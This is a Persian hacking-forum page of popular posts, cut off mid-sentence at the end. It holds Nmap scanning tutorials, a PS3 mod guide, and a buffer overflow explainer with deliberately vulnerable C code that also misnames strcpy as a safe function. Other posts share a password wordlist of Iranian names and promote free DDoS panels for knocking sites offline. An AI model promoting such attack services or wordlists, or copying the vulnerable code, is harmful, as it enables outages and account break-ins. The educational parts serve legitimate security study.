رفتن به مطلب

تخته امتیازات

  1. D3F417

    D3F417

    کاربر ویژه


    • امتیاز

      7

    • ارسال ها

      73


  2. Sadra

    Sadra

    جاویدان


    • امتیاز

      6

    • ارسال ها

      484


  3. abarestan

    abarestan

    جاویدان


    • امتیاز

      6

    • ارسال ها

      543


  4. proxy

    proxy

    مدیر ارشد


    • امتیاز

      4

    • ارسال ها

      744


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان 02/15/2025 در همه بخش ها

  1. آموزش عملی و کامل ابزار Nmap (از 0 تا 100) ( کامل ترین تاپیک آموزشی Nmap) ابزار Nmap (Network Mapper) یکی از پرکاربردترین ابزارها در دنیای امنیت سایبری و تست نفوذ است که برای شناسایی و اسکن شبکه‌ها، سرورها و دستگاه‌ها در یک شبکه استفاده می‌شود. Nmap به طور خاص برای بررسی وضعیت پورت‌ها، شناسایی سیستم‌عامل‌ها و شناسایی آسیب‌پذیری‌ها کاربرد دارد. در این مقاله، آموزش عملی و جامع استفاده از ابزار Nmap را از 0 تا 100 پوشش خواهیم داد. این آموزش شامل مراحل مختلف استفاده از Nmap برای اسکن شبکه‌ها و تحلیل اطلاعات است. 1. آشنایی با مفاهیم اولیه Nmap Nmap برای شناسایی اطلاعاتی مانند پورت‌های باز، سیستم‌عامل، خدمات در حال اجرا و اطلاعات دیگر مربوط به دستگاه‌ها و شبکه‌ها طراحی شده است. پورت اسکنینگ (Port Scanning): یکی از اصلی‌ترین کاربردهای Nmap است که برای شناسایی پورت‌های باز و فعال در یک سیستم یا شبکه استفاده می‌شود. OS Detection (شناسایی سیستم‌عامل): Nmap قادر است سیستم‌عامل‌های مختلف دستگاه‌های موجود در شبکه را شناسایی کند. Service Version Detection (شناسایی نسخه سرویس‌ها): Nmap می‌تواند نسخه دقیق سرویس‌های در حال اجرا بر روی پورت‌های مختلف را شناسایی کند. Scripting Engine (NSE): Nmap دارای یک موتور اسکریپت‌نویسی به نام Nmap Scripting Engine است که برای انجام تحلیل‌های پیشرفته و شناسایی آسیب‌پذیری‌ها کاربرد دارد. 2. نصب Nmap Nmap می‌تواند بر روی اکثر سیستم‌عامل‌ها مانند لینوکس، ویندوز و macOS نصب شود. در اینجا نحوه نصب آن بر روی لینوکس و ویندوز توضیح داده شده است: 1. نصب Nmap در ویندوز (Windows) روش اول: نصب با استفاده از فایل اجرایی به وب‌سایت رسمی Nmap بروید: Nmap Download Page. نسخه ویندوز را انتخاب کرده و فایل اجرایی (EXE) را دانلود کنید. فایل دانلود شده را اجرا کرده و مراحل نصب را دنبال کنید. پس از نصب، برای استفاده از Nmap می‌توانید از Command Prompt (CMD) یا PowerShell استفاده کنید. برای بررسی اینکه نصب به درستی انجام شده است، دستور زیر را در CMD وارد کنید: nmap --version روش دوم: نصب از طریق Chocolatey (اگر Chocolatey را قبلاً نصب کرده‌اید) choco install nmap 2. نصب Nmap در لینوکس (Linux) در لینوکس، نصب Nmap به راحتی از طریق مدیر بسته (Package Manager) قابل انجام است. اوبونتو / دبیان / لینوکس مبتنی بر دبیان (Debian-based Linux Distributions) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo apt update sudo apt install nmap فدورا / ردهت / سنت‌اواس (Fedora / RedHat / CentOS) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo dnf install nmap آرچ لینوکس (Arch Linux) ترمینال را باز کنید و دستور زیر را وارد کنید: sudo pacman -S nmap برای بررسی نصب، دستور زیر را در ترمینال وارد کنید: nmap --version 3. نصب Nmap در مک (Mac) برای نصب Nmap در macOS، شما می‌توانید از Homebrew استفاده کنید. اگر Homebrew را ندارید، ابتدا باید آن را نصب کنید. 3.1. نصب Homebrew (در صورت عدم وجود) ترمینال را باز کرده و دستور زیر را وارد کنید: /bin/bash -c "$(curl -fsSL [Hidden Content])" 3.2. نصب Nmap با Homebrew پس از نصب Homebrew، دستور زیر را در ترمینال وارد کنید: brew install nmap بررسی نصب پس از نصب، می‌توانید از دستور زیر برای بررسی نسخه Nmap استفاده کنید: nmap --version نکات مهم اطمینان حاصل کنید که به عنوان administrator یا root در سیستم خود وارد شده‌اید تا Nmap دسترسی لازم برای انجام اسکن‌های شبکه را داشته باشد. اگر از سیستم‌های مبتنی بر لینوکس استفاده می‌کنید، ممکن است به بعضی از دستورها نیاز به نصب پیش‌نیازها داشته باشید (مانند sudo apt install libpcap-dev در برخی توزیع‌ها). منتظر پارت بعدی باشید 🙂 امیدوارم خوشتون اومده باشه میتونید از طریق پیام دادن به من هر پیشنهاد / انتقاد / مشکل هست در رابطه با این تاپیک درمیون بزارید با کمال میل خوشحال میشم حمایت هم کنید 🫡
    2 امتیاز
  2. منتظر پارت بعدی هستم👏❤️
    2 امتیاز
  3. آشنایی با دستورات ابتدایی Nmap آشنایی با دستورات ابتدایی Nmap Nmap (Network Mapper) یکی از ابزارهای مهم و محبوب برای نقشه‌برداری از شبکه‌ها و شناسایی نقاط ضعف امنیتی در سیستم‌های شبکه‌ای است. این ابزار متن‌باز و قدرتمند به مدیران سیستم و متخصصان امنیت شبکه این امکان را می‌دهد که با استفاده از دستورات ساده و پیشرفته شبکه‌های مختلف را اسکن کرده و اطلاعات دقیقی را در مورد دستگاه‌ها، خدمات در حال اجرا، پورت‌ها و حتی سیستم‌عامل‌ها به‌دست آورند. در ادامه، به بررسی برخی از دستورات ابتدایی و رایج Nmap می‌پردازیم که می‌توانند در اسکن‌های ابتدایی شبکه بسیار مفید واقع شوند. 1. دستور پایه‌ای nmap [IP] این دستور ساده‌ترین و ابتدایی‌ترین روش برای اسکن یک دستگاه یا هاست است. با وارد کردن آدرس IP یا نام دامنه در کنار دستور nmap، اطلاعاتی مانند پورت‌های باز و خدمات در حال اجرا روی آن دستگاه نمایش داده می‌شود. nmap 192.168.1.1 این دستور اطلاعاتی در مورد پورت‌های باز و سرویس‌های فعال در دستگاه هدف ارائه می‌دهد. 2. سوئیچ -sS: اسکن TCP SYN (Stealth Scan) این نوع اسکن یکی از سریع‌ترین روش‌ها برای شناسایی پورت‌های باز است. Nmap با ارسال بسته‌های SYN به پورت‌ها، به‌طور غیرمستقیم وضعیت پورت‌ها را بررسی می‌کند و به هیچ‌وجه اتصال کامل به هدف برقرار نمی‌کند. این کار باعث می‌شود که اسکن شبیه به اتصال عادی به‌نظر برسد و شناسایی آن برای سیستم هدف سخت‌تر باشد. nmap -sS 192.168.1.1 در این اسکن، پورت‌هایی که در پاسخ به بسته SYN یک بسته RST ارسال می‌کنند، بسته می‌شوند و پورت‌هایی که پاسخ SYN/ACK می‌دهند، باز در نظر گرفته می‌شوند. 3. سوئیچ -sT: اسکن TCP Connect در این نوع اسکن، Nmap از اتصال کامل TCP برای شناسایی پورت‌های باز استفاده می‌کند. این اسکن کندتر از اسکن SYN است اما اگر شما به سیستم دسترسی داشته باشید، می‌توانید از آن استفاده کنید. nmap -sT 192.168.1.1 این دستور به Nmap اجازه می‌دهد که اتصال TCP کامل را برای هر پورت برقرار کرده و در صورت موفقیت، پورت را باز اعلام کند. 4. سوئیچ -sP (Ping Scan): اسکن دستگاه‌های فعال در شبکه این سوئیچ برای شناسایی دستگاه‌های فعال در یک شبکه محلی (Local Network) استفاده می‌شود. Nmap با ارسال پینگ به دستگاه‌ها، تشخیص می‌دهد کدام یک از دستگاه‌ها به‌طور فعال در شبکه حضور دارند. nmap -sP 192.168.1.0/24 این دستور تمام دستگاه‌های فعال در شبکه‌ی 192.168.1.0/24 را شناسایی می‌کند. 5. سوئیچ -sV: شناسایی نسخه خدمات این سوئیچ برای شناسایی نسخه‌های دقیق خدمات اجرا شده بر روی پورت‌های باز استفاده می‌شود. Nmap پس از شناسایی پورت‌های باز، اقدام به شناسایی نسخه‌های خدمات (مانند Apache، OpenSSH و غیره) می‌کند. nmap -sV 192.168.1.1 این دستور نسخه دقیق سرویس‌های در حال اجرا در پورت‌های باز را گزارش می‌دهد. 6. سوئیچ -O: شناسایی سیستم‌عامل با استفاده از این سوئیچ می‌توانید سیستم‌عامل دستگاه هدف را شناسایی کنید. Nmap از ویژگی‌های خاص هر سیستم‌عامل برای تشخیص آن استفاده می‌کند. nmap -O 192.168.1.1 این دستور سیستم‌عامل دستگاه هدف را شناسایی و گزارش می‌دهد. 7. سوئیچ -p: انتخاب پورت‌ها برای اسکن این سوئیچ برای مشخص کردن پورت‌های خاص برای اسکن استفاده می‌شود. با این سوئیچ می‌توانید فقط پورت‌های خاصی را برای اسکن انتخاب کنید. nmap -p 22,80,443 192.168.1.1 این دستور فقط پورت‌های 22 (SSH)، 80 (HTTP) و 443 (HTTPS) را اسکن می‌کند. 8. سوئیچ -T<0-5>: تنظیم سرعت اسکن Nmap به شما این امکان را می‌دهد که سرعت اسکن را تنظیم کنید. با استفاده از این سوئیچ می‌توانید میزان صبر Nmap را تنظیم کرده و اسکن سریع‌تری داشته باشید. -T0 برای اسکن بسیار آهسته -T1 برای اسکن آهسته -T2 برای اسکن متوسط -T3 برای اسکن سریع -T4 برای اسکن بسیار سریع -T5 برای اسکن سریع‌ترین حالت nmap -T4 192.168.1.1 این دستور اسکن سریع‌تری نسبت به حالت پیش‌فرض انجام می‌دهد. 9. سوئیچ -A: اسکن کامل با شناسایی سیستم‌عامل و نسخه‌ها این سوئیچ به شما امکان می‌دهد که تمام ویژگی‌های Nmap مانند اسکن سیستم‌عامل، شناسایی نسخه خدمات، اسکن اسکریپت‌های Nmap و غیره را در یک اسکن ترکیب کنید. nmap -A 192.168.1.1 این دستور تمام اطلاعات ممکن از دستگاه هدف را جمع‌آوری می‌کند. 10. سوئیچ -v: نمایش جزئیات بیشتر اسکن این سوئیچ برای مشاهده جزئیات بیشتر از مراحل اسکن استفاده می‌شود. با استفاده از -v می‌توانید جزئیات بیشتری از آنچه که Nmap در حال انجام است، مشاهده کنید. nmap -v 192.168.1.1 این دستور علاوه بر اسکن دستگاه، جزئیات بیشتری از فرآیند اسکن را به شما نمایش می‌دهد. 11. سوئیچ --script: اجرای اسکریپت‌های Nmap Nmap به شما این امکان را می‌دهد که اسکریپت‌های خاصی را برای انجام اسکن‌های پیشرفته‌تر اجرا کنید. این اسکریپت‌ها برای شناسایی آسیب‌پذیری‌ها، بررسی خدمات خاص و کارهای دیگر مفید هستند. nmap --script=default 192.168.1.1 این دستور اسکریپت‌های پیش‌فرض Nmap را اجرا می‌کند. 12. سوئیچ -iL: اسکن از روی لیست آدرس‌های IP این سوئیچ به شما این امکان را می‌دهد که چندین آدرس IP را از یک فایل ورودی برای اسکن کردن به Nmap بدهید. nmap -iL target_ips.txt این دستور فایل target_ips.txt را می‌خواند و اسکن را برای تمام IPهای موجود در آن اجرا می‌کند. 13. سوئیچ -n: جلوگیری از حل نام DNS با استفاده از این سوئیچ می‌توانید از حل نام دامنه DNS جلوگیری کنید و فقط از آدرس‌های IP برای اسکن استفاده کنید. nmap -n 192.168.1.1 این دستور از حل نام دامنه DNS خودداری می‌کند. 14. سوئیچ -F: اسکن سریع‌تر با پورت‌های معمولی اگر می‌خواهید یک اسکن سریع‌تری داشته باشید و فقط پورت‌های پرکاربرد را اسکن کنید، می‌توانید از سوئیچ -F استفاده کنید. nmap -F 192.168.1.1 این دستور به‌طور پیش‌فرض فقط پورت‌های پرکاربرد را اسکن می‌کند. نتیجه‌گیری Nmap ابزاری قدرتمند و جامع برای شناسایی و تحلیل شبکه‌ها است. با استفاده از دستورات و سوئیچ‌های مختلف این ابزار، شما می‌توانید انواع مختلفی از اسکن‌ها را انجام داده و اطلاعات دقیقی در مورد شبکه و دستگاه‌ها به‌دست آورید. از اسکن‌های ساده گرفته تا اسکن‌های پیشرفته و شناسایی سیستم‌عامل‌ها، Nmap به شما کمک می‌کند که امنیت شبکه‌های خود را بررسی کنید و نقاط ضعف آن‌ها را شناسایی کنید. منتظر پارت بعدی باشید 🙂 امیدوارم خوشتون اومده باشه میتونید از طریق پیام دادن به من هر پیشنهاد / انتقاد / مشکل هست در رابطه با این تاپیک درمیون بزارید با کمال میل خوشحال میشم حمایت هم کنید 🫡
    2 امتیاز
  4. با سلام دوستان یک پسورد لیست از اسامی اسم های ایرانی اماده کردم. پسورد فایل: guardiran.org passlist.rar تشکر نشانه رضایت شماست
    2 امتیاز
  5. سلام خدمت کاربرای عزیز چند سالی غیر فعال بودم اما بالاخره مشکلات کمی کمتر شد و بالاخره میتونم در کنار شما باشم . یکی از آموزشاتی که در هیچ سایت و انجمنی ندیدم قرار بگیره روش های کرک ، هک ، فعالسازی و ... در کنسول های بازی هستش که بر فرض مثال نصب مود های gta v روی ps3 در هیچ سایت ایرانی وجود نداره . امیدوارم بزودی بخشی در انجمن برای موضوعات وابسته به کنسول ها نیز قرار بگیره که تاپیک رو انتقال بدم . خب دوستان قبل از انجام کار باید بگم که این آموزش صرفا برای کنسول های جیلبریک و کپی خور شده هستش و در آینده برای کنسول های orginal نیز تاپیکی قرار میدم . *نکته : نصب مود در کنسول ps3 تفاوت بسیار زیادی با PC و دیگر کنسول ها داره پس مرحله به مرحله پیش برید اطلاعات کنسول های مورد استفاده من : ( این روش بر روی تمامی کنسول های PS3 کپی خور عمل میکند ) PS3 Slim 120GB و PS3 Super Slim 240 GB CFW : 4.82 کبری و CFW : 4.81 فرکس ------------------------ در انتها و در پست های بعدی نسخه های مختلف مود لودر ( update ) و نسخه های مختلف مود بازی GTA V رو قرار میدم *نکته : این کار هیچ تغییری در اصل بازی نصبی شما ایجاد نمیکند و بازی شما از همان مرحله فعلی شما لود خواهد شد *نکته : مسئولیت اشتباه در حین انجام کار و اشکال در روند اجرای بازی با شما می باشد پس مراقب باشید و از بازی خودتون بکاپ تهیه کنید *نکته : سعی کنید به جای جایگزینی از تغییر نام و قرار دادن فایل ها در پوشه های مورد نظر استفاده کنید *نکته : برای برگشت دادن بازی به حالت عادی کافیست فایل های بوت و اپدیت رو به نسخه اصلی برگردونید و همچنین فایل sprx رو از قسمت tmp پاک کنید ***نکته : این آموزش برای اولین بار توسط بنده در این انجمن قرار داده میشه و بزودی نسخه فیلم برداری شده از کنسول های خودم رو نیز در همین تاپیک قرار میدم ----------------------- مرحله اول : چک کنید که برنامه Multiman روی کنسول شما نصب شده باشه . ( در صورت نصب نبودن به انتهای پست مراجعه کنید و سپس ادامه مراحل را انجام دهید ) مرحله دوم : فایل های آپلودی زیر را دانلود کنید مرحله سوم : فلش usb خود را به Fat32 فرمت کنید و سپس فایل های اکسترکت شده را در فلش قرار دهید مرحله چهارم : فلش را به کنسول متصل کرده و وارد محیط اصلی کنسول شوید مرحله پنجم : وارد مولتی من در دستگاه خود شده و به سربرگ اول مولتی من و File Manager mmOS برید مرحله ششم : پنجره های باز شده را ببندید و روی دکمه ps3 Root در بالای صفحه خود دوبار X را بفشارید مرحله هفتم : وارد بخش dev_usb000 شوید مرحله هشتم : موس خود را روی فایل EBOOT.BIN اورده و کلید O رو بزنید و در منو باز شده روی Copy دکمه X را بفشارید تا فایل کپی شود مرحله نهم : مجددا روی ps3 Root کلیک کرده و اینبار وارد بخش dev_hdd0 شوید مرحله دهم : وارد پوشه game شوید ( حروف کوچک و درونش پوشه های مختلف بازی های نصب شده روی کنسول را مشاهده میکنید ) مرحله یازدهم : همونطور که مشاهده میکنید پوشه های با نام های Bles0180 , Bles0170 و در اینجا قرار دارند ، خب بازی GTA V عموما با نام Bles1807 نمایش داده میشود که یک پوشه هم نام با پسوند instal در زیر آن مشاهده می شود ، وارد این پوشه شوید ( در صورت مشاهده نکردن این پوشه ، همه پوشه هارا باز کنید و روی icon کلیک کنید تا لوگو بازی رو ببینید و gta رو پیدا کنید ) مرحله دوازدهم : روی پوشه USRDIR که در داخل پوشه bles قرار گرفته کلیک کنید و سپس با زدن دکمه O روی دسته و paste فایل بوت را جایگزین ( replace ) فایل موجود کنید ( البته جهت محکم کاری و اینکه مراقب فایل اصلی بازی باشیم میتونید به جای جایگزین کردن نام فایل بوت اصلی رو تغییر بدید Rename و سپس paste کنید تا هر زمان که خواستید بازی رو به حالت اولیه برگردانید ) مرحله سیزدهم : همین کار انتقال و کپی رو با فایل update که در فلش خودتون دارید انجام بدید و دو فایل رو جایگزین کنید ( فایل آپدیت مود لودر هستش و مدل های مختلفی داره که در زیر قرار میدم ) مرحله چهاردهم : 80% کار کامل شده ، خب شما یک فایل دیگه در فلش خودتون دارید با پسوند sprx ، این فایل رو کپی کنید و اینبار وارد بخش tmp در dev_hdd0 کنسول خود بشید ( در صورت مشاهده نکردن این پوشه با دکمه های بالا و پایین آنالوگ (D-pad) پایین آمده تا پوشه را مشاهده کنید ) مرحله پانزدهم : با زدن کلید O فایل رو همین پوشه paste کنید مرحله شانزدهم : با فشردن کلید R1 روی دسته خود وارد بخش Games در مولتی من شوید و بازی gta v اینبار مود شده خود را فعال کنید تمام ------------------------ مولتی من : فایل دانلود شده را در usb خود قرار داده ، از قسمت game وارد بخش instal packege file بشید و فایل با پسوند pkg رو روی دستگاه خودتون نصب کنید دانلود MultiMan 4.82 از سرور CFA ( در صورتی که کاستوم فریمور دستگاه شما پایین تر می باشد ورژن پایین تر این برنامه را از سایت های دیگر دانلود کنید ) ----------------------- نام و آپشن های مود GTA V پیوست شده در زیر : mod loader : tony efzi نحوه فعال سازی R3+L3 mod menu : freedom V1.5 پسورد فایل ها : guardiran.org ---------------------------------------------- لینک دانلود : GTA V PS3 MOD Menu
    1 امتیاز
  6. سلام و خسته نباشید خدمت تمامی اعضای گاردایران و مدیران یه چند وقتی نبودم گفتم امروز بیام یه چیزی رو پست کنم که جایی ندیدم که باشه:) راجب انواع برنامه های دیداس و غیره قبلا دوستان تو تاپیک های مختلف توضیح دادن ولی تاحالا کسی پنل های اتک رو نزاشته بود، یا حداقل من ندیدم [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] این یه لیست از پنل های فری هستش که باهاش میتونید خیلی سایتا و سرور ها رو آف کنید و حتی بعضی از بهترین فایروال ها هم بعضی وقتا آف میشن(با پنل ipstreeser) در رابطه با کپی رایت هم منبع این آموزش هم سایت خودم بود که اسمی نمیارم، و تنها کسی هم که این پنل ها رو گذاشته خودم بودم پس فکر نکنم نیازی به کپی رایت باشه
    1 امتیاز
  7. سرریز بافر (Buffer Overflow) چیست؟ سرریز بافر یک مشکل امنیتی و خطای برنامه نویسی است که وقتی اتفاق می افتد که یک برنامه سعی میکند دادههای بیشتری از حد ظرفیت مشخص شده در یک فضای ذخیره سازی موقت (به نام بافر) بنویسد. این اتفاق شبیه این است که یک لیوان را آنقدر پر کنید که آب از لبههای آن سرریز شود! توضیح ساده با مثال: فرض کنید یک برنامه کامپیوتری دارید که یک فیلد برای وارد کردن نام کاربری دارد. این فیلد طوری طراحی شده که فقط ۱۰ کاراکتر جای میدهد (مثل یک لیوان کوچک). حالا اگر کسی به جای ۱۰ کاراکتر، ۱۵ کاراکتر وارد کند، ۵ کاراکتر اضافی جایی میروند که نباید بروند! این داده های اضافی ممکن است به بخشهای دیگر حافظه کامپیوتر که برای کارهای مهم دیگر (مثل ذخیره پسورد یا دستورات برنامه) استفاده میشوند، نفوذ کنند. چرا خطرناک است؟ ۱. تغییر رفتار برنامه: اگر هکر بتواند داده های سرریز شده را کنترل کند، ممکن است بتواند برنامه را مجبور به اجرای کدهای مخرب کند (مثلاً باز کردن در پشتی برای دسترسی به سیستم). ۲. ازکاراندازی سرویس: سرریز بافر میتواند باعث کرش کردن برنامه یا سیستم شود. ۳. دسترسی غیرمجاز: در بدترین حالت، هکرها از این آسیب پذیری برای نفوذ به سرورها، سرقت اطلاعات، یا انتشار بدافزار استفاده میکنند. چطور اتفاق میافتد؟ برنامهنویسان گاهی فراموش میکنند محدودیت اندازه دادهها را بررسی کنند. زبانهای برنامهنویسی مثل C یا C++ که کنترل کاملی روی حافظه دارند، بیشتر در معرض این خطا هستند. مثال معروف: بسیاری از ویروسها و کرمهای کامپیوتری قدیمی (مثل کرم موریس در سال ۱۹۸۸) از همین آسیب پذیری استفاده می کردند. چگونه جلوگیری کنیم؟ ۱. بررسی اندازه داده ها: قبل از نوشتن داده در بافر، مطمئن شوید اندازه آن از حد مجاز بیشتر نباشد. ۲. استفاده از زبانهای امنتر: زبانهایی مانند Python یا Java به صورت خودکار از سرریز بافر جلوگیری میکنند. ۳. ابزارهای محافظتی: Stack Canaries: قطعه داده هایی که تغییر غیرمنتظره آنها هشدار می دهد. ASLR: تصادفی سازی آدرس حافظه برای سخت تر کردن نفوذ. DEP: جلوگیری از اجرای کد در بخشهای غیر مجاز حافظه. جمعبندی سرریز بافر مثل پرکردن بیش از حد یک لیوان است! اگر برنامه نویسان مراقب نباشند، این خطای ساده میتواند به مجرمان سایبری اجازه دهد کنترل سیستم را بدست بگیرند. با رعایت اصول کدنویسی ایمن و استفاده از تکنیکهای محافظتی، میتوان از آن جلوگیری کرد. اهمیت درک سرریز بافر (Buffer Overflow) به عنوان یک آسیب‌پذیری امنیتی درک سرریز بافر به عنوان یک آسیب‌پذیری امنیتی نه تنها برای توسعه‌دهندگان، بلکه برای تمام فعالان حوزه امنیت سایبری ضروری است. این آسیب‌پذیری یکی از قدیمی‌ترین و خطرناک‌ترین مشکلات امنیتی است که هنوز هم در سیستم‌های مدرن مشاهده می‌شود. در زیر دلایل اصلی اهمیت این موضوع بررسی می‌شود: ۱. تاریخچه طولانی و تاثیر گسترده سرریز بافر از دهه ۱۹۸۰ تا امروز به عنوان یک نقطه ضعف کلیدی در حملات سایبری استفاده شده است. مثال تاریخی: کرم موریس در سال ۱۹۸۸ که با سوءاستفاده از این آسیب‌پذیری، ۱۰% از سیستم‌های متصل به اینترنت را آلوده کرد. حتی در سال‌های اخیر، آسیب‌پذیری‌هایی مثل Heartbleed (۲۰۱۴) یا EternalBlue (۲۰۱۷) از مکانیزم‌های مشابه استفاده کرده‌اند. نتیجه: آشنایی با این آسیب‌پذیری کمک می‌کند الگوهای حملات قدیمی و جدید را تشخیص دهید. ۲. پتانسیل تخریب بالا سرریز بافر به هکرها اجازه می‌دهد: کدهای مخرب را اجرا کنند (مثلاً باز کردن دسترسی از راه دور). برنامه یا سیستم را کرش کنند (مانند حملات DOS). داده‌های حساس (مانند پسوردها یا اطلاعات بانکی) را سرقت کنند. مثال: یک سرریز بافر در یک سرور وب می‌تواند به هکر اجازه دهد کل سیستم را کنترل کند. ۳. شیوع در زبان‌ها و سیستم‌های پراستفاده زبان‌های C و C++ به دلیل دسترسی مستقیم به حافظه، بیشتر در معرض این آسیب‌پذیری هستند. سیستم‌هایی که با این زبان‌ها نوشته شده‌اند (مثل سیستمعامل‌ها، مرورگرها، برنامه‌های Embedded) هنوز هم ممکن است حاوی چنین خطاهایی باشند. حتی برنامه‌های مدرن (مثل بازی‌ها یا نرم‌افزارهای سازمانی) می‌توانند به دلیل کدنویسی ضعیف آسیب‌پذیر باشند. نتیجه: تا زمانی که سیستم‌های Legacy یا کدهای قدیمی استفاده می‌شوند، سرریز بافر یک تهدید زنده است. ۴. پایه‌ای برای یادگیری امنیت سایبری درک سرریز بافر به شما کمک می‌کند مفاهیم زیر را عمیقاً بفهمید: نحوه کارکرد حافظه کامپیوتر (Stack، Heap، و غیره). تفاوت بین زبان‌های مدیریت حافظه (مانند Rust) و زبان‌های Unmanaged (مانند C). مکانیزم‌های محافظتی مثل ASLR، DEP، و Stack Canaries. این مفاهیم برای تحلیل سایر آسیب‌پذیری‌ها (مثل SQL Injection یا ROP Attacks) نیز ضروری هستند. ۵. ضرورت پیشگیری و رفع آسیب‌پذیری توسعه‌دهندگان با یادگیری سرریز بافر می‌توانند: از توابع ناامن (مثل strcpy در C) اجتناب کنند. از توابع ایمن (مثل strcpy با بررسی طول) استفاده کنند. ابزارهای تحلیل کد (مثل Valgrind یا AddressSanitizer) را به کار گیرند. سازمان‌ها نیز با آموزش تیم‌های خود، ریسک حملات را کاهش می‌دهند. ۶. جلوگیری از حملات زنجیره‌ای بسیاری از حملات پیشرفته (مثل APTها یا حملات روز صفر) ترکیبی از چندین آسیب‌پذیری هستند. سرریز بافر اغلب به عنوان اولین قدم برای دسترسی به سیستم استفاده می‌شود. مثلاً هکر ابتدا با سرریز بافر کنترل بخشی از حافظه را می‌گیرد، سپس از تکنیک‌هایی مانند ROP برای اجرای کد مخرب استفاده می‌کند. ۷. اهمیت در آزمون‌های نفوذ تسترهای نفوذ و هکرهای اخلاقی (Ethical Hackers) باید بتوانند سرریز بافر را شناسایی و شبیه‌سازی کنند. ابزارهایی مثل Metasploit یا Immunity Debugger برای اکسپلویت کردن این آسیب‌پذیری طراحی شده‌اند. آزمون‌های موسسه‌هایی مانند OSCP نیز بر شناسایی چنین آسیب‌پذیری‌هایی تمرکز دارند. ۸. تاثیر بر قوانین امنیتی استانداردهایی مانند CWE (Common Weakness Enumeration) سرریز بافر را در رده CWE-120 به عنوان یک نقطه ضعف بحرانی فهرست می‌کنند. سازمان‌ها برای رعایت مقرراتی مثل GDPR یا ISO 27001 موظفند چنین آسیب‌پذیری‌هایی را برطرف کنند. جمع‌بندی نهایی سرریز بافر تنها یک «خطای برنامه نویسی» ساده نیست، بلکه یک گره امنیتی حیاتی است که در صورت نادیده گرفتن، می‌تواند به فاجعه منجر شود. درک این مفهوم: به توسعه‌دهندگان کمک می‌کند کدهای امن‌تری بنویسند. به مدافعان امنیت سایبری اجازه می‌دهد حملات را پیش‌بینی و خنثی کنند. به سازمان‌ها در جلوگیری از زیان‌های مالی و اعتباری کمک می‌کند. جلوگیری از تاثیرات منفی برای کاهش خسارت‌های سرریز بافر: ۱. استفاده از زبان‌های ایمن (مثل Rust یا Python) که مدیریت حافظه خودکار دارند. ۲. فعال‌سازی مکانیزم‌های دفاعی: ASLR (تصادفی‌سازی آدرس حافظه). DEP (جلوگیری از اجرای کد در حافظه داده). Stack Canaries (شناسایی تغییرات غیرمجاز در Stack). ۳. بررسی منظم کد با ابزارهای تحلیل استاتیک (Static Analysis). ۴. آزمون نفوذپذیری (Penetration Testing) برای شناسایی آسیب‌پذیری‌ها. نتیجه‌گیری سرریز بافر تنها یک خطای فنی نیست، بلکه یک تهدید امنیتی چندوجهی است که می‌تواند امنیت داده‌ها، حریم خصوصی، و حتی جان انسان‌ها را به خطر بیاندازد. درک عمیق این آسیب‌پذیری و پیاده‌سازی راهکارهای پیشگیرانه، برای تمام سازمان‌ها و توسعه‌دهندگان ضروری است. 😊 حافظه و پشته (Stack) ساختار حافظه: در سیستم‌های کامپیوتری، حافظه به بخش‌های مختلفی تقسیم می‌شود که هر کدام کارکرد خاصی دارند: کد (Text Segment): شامل کد برنامه اجرایی است. این بخش فقط خواندنی است و حافظت‌هایی در برابر نوشتن روی آن وجود دارد. داده (Data Segment): برای ذخیره متغیرهای سراسری (global) و داده‌های مقداردهی شده استفاده می‌شود. پشته (Stack): برای ذخیره اطالاعات محلی توابع، آرگومان‌ها و آدرس بازگشت استفاده می‌شود. در پشته، آخرین داده‌ای که افزوده شده، اولین داده‌ای است که حذف می‌شود (LIFO). هیپ (Heap): برای تخصیص حافظه‌ی پویا در طول اجرای برنامه استفاده می‌شود. مدیریت حافظه در این بخش باید به صورت صریح توسط برنامه‌نویس انجام شود. پشته و نحوه عملکرد آن (LIFO): پشته براساس اصل Last In, First Out عمل می‌کند. در اکثر زبان‌های برنامه‌نویسی، مانند C و C++، وقتی یک تابع فراخوانی می‌شود، فضای لازم برای متغیرهای محلی و آدرس بازگشت در پشته تخصیص داده می‌شود. نقش پشته در فراخوانی توابع: پشته نقش مهمی در فراخوانی توابع ایفا می‌کند. هنگام فراخوانی یک تابع: آرگومان‌ها و آدرس بازگشت تابع در پشته ذخیره می‌شود. پس از بازگشت از تابع، آدرس بازگشت خوانده شده و برنامه به آنجا ادامه پیدا می‌کند. متغیرها و بافرها تعریف متغیرها و بافرها: متغیر: در برنامه‌نویسی، متغیرها مکان‌هایی در حافظه هستند که برای ذخیره داده‌ها تعریف می‌شوند. بافر: نوعی آرایه یا بلوک حافظه است که برای ذخیره داده‌ها در هنگام انتقال میان دو فرآیند یا بین بخش‌های مختلف یک برنامه استفاده می‌شود. نحوه ذخیره داده‌ها در بافرها و اهمیت اندازه بافر: بافر‌ها به صورت متوالی در حافظه ذخیره می‌شوند و در صورت استفاده ناصحیح، ممکن است منجر به مشکلاتی مانند “Buffer Overflow” شوند. اگر ورودی بافر‌ها به درستی کنترل نشود، می‌تواند باعث مشکلات امنیتی جدی شود. نحوه فراخوانی توابع و بازگشت آدرس نحوه فراخوانی توابع در C/C++: هنگام فراخوانی تابع، آدرس دستور بعدی در پشته ذخیره می‌شود تا برنامه پس از اجرای تابع به این دستور برگردد. این مکان با استفاده از آدرس بازگشت مدیریت می‌شود. نقش پشته در ذخیره آدرس بازگشت: هر بار که تابعی فراخوانی می‌شود، آدرس بازگشت در پشته ذخیره می‌شود. اگر این آدرس دچار تغییر شود (مانند حالتی که در حملات امنیتی رخ می‌دهد)، می‌تواند جریان اجرای برنامه را به یک مسیر غیرمنتظره ببرد. #include <stdio.h> #include <string.h> void vulnerableFunction(char *input) { char buffer[10]; strcpy(buffer, input); // بدون بررسی اندازه ورودی، ورودی را درون بافر کپی می‌کند printf("Input received: %s\n", buffer); } int main() { char userInput[100]; printf("Enter something: "); gets(userInput); // دریافت ورودی از کاربر vulnerableFunction(userInput); return 0; } نکات مهم: در تابع vulnerableFunction، تابع strcpy مستقیماً از ورودی کاربر استفاده کرده و آن را به buffer کپی می‌کند. اگر ورودی بزرگتر از اندازه بافر باشد، باعث “Buffer Overflow” می‌شود. استفاده از gets خطرناک است زیرا هیچ کنترلی بر روی اندازه ورودی ندارد. معرفی محافظت‌های رایج Stack Canaries: مقادیر خاصی که بین بافر و آدرس بازگشت قرار 